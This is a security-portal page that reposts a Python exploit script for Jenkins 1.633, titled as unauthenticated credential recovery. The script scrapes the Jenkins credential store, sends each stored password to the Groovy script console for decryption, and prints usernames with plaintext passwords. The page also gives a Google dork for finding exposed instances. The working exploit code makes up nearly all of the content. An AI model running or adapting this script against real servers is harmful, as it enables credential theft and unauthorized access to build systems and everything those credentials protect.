首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Jenkins 1.633 - Unauthenticated Credential Recovery
来源:http://www.th3r3p0.com 作者:TheRepo 发布时间:2015-11-11  
# Exploit Title: Jenkins Unauthenticated Credential Recovery
# Disclosure Date: 10/14/2015
# Response Date: 10/14/2015
# Response: "Recommend this be rejected as a vulnerability."
# Full report including response: http://www.th3r3p0.com/vulns/jenkins/jenkinsVuln.html
# Vendor Homepage: https://jenkins-ci.org/
# Tested on: Jenkins v1.633
# Author = 'Th3R3p0' | Justin Massey
# Google Dork: intitle:"Dashboard [Jenkins]" Credentials
 
import requests
import re
from BeautifulSoup import BeautifulSoup
import urllib
 
 
# Usage: Modify the URL below to match the target host and port
#   Must have trailing slash at end of URL
url='http://192.168.1.151:8080/'
 
# makes request to gather all users with stored credentials
r= requests.get(url + 'credential-store/domain/_/')
soup = BeautifulSoup(r.text)
 
# loop to go through all hrefs and match the regex "credential" and add the urls to the users list
users = []
for link in soup.body.findAll('a', href=True):
    m = re.match("credential", link['href'])
    if m:
        if link['href'] not in users:
            users.append(link['href'])
 
for users in users:
    r2 = requests.get(url + 'credential-store/domain/_/'+users+'/update')
    soup2 = BeautifulSoup(r2.text)
 
    # Finds the user and password value in html and stores in encPass variable
    user = soup2.body.findAll(attrs={"name" : "_.username"})[0]['value']
    encPass = soup2.body.findAll(attrs={"name" : "_.password"})[0]['value']
    # Encodes the password to www-form-urlencoded standards needed for the expected content type
    encPassEncoded = urllib.quote(encPass, safe='')
 
    # Script to run in groovy scripting engine to decrypt the password
    script = 'script=hudson.util.Secret.decrypt+%%27' \
             '%s'\
             '%%27&json=%%7B%%22script%%22%%3A+%%22hudson.util.Secret.decrypt+%%27' \
             '%s' \
             '%%27%%22%%2C+%%22%%22%%3A+%%22%%22%%7D&Submit=Run' % (encPassEncoded, encPassEncoded)
 
    # Using sessions because the POST requires a session token to be present
    with requests.Session() as s:
        r3 = s.get(url+'script')
        headers = {'content-type': 'application/x-www-form-urlencoded'}
        r3 = s.post(url+'script',data=script, headers=headers)
    soup3 = BeautifulSoup(r3.text)
 
    # Extracts password from body
    password = soup3.body.findAll('pre')[1].text
    password = re.sub('Result:', '', password)
    print "User: %s | Password:%s" % (user, password)
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Huawei HG630a and HG630a-50 -
·IBM Installation Manager 1.8.1
·POP Peeper 4.0.1 - SEH Over-Wr
·FBZX 2.10 - Local Stack-Based
·WordPress Ajax Load More PHP U
·TACK 1.07 - Local Stack-Based
·QNap QVR Client 5.1.0.11290 -
·TUDU 0.82 - Local Stack-Based
·China Chopper Caidao PHP Backd
·Sam Spade 1.14 - S-Lang Comman
·Symantec pcAnywhere 12.5.0 Win
·vBulletin 5.1.2 Unserialize Co
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved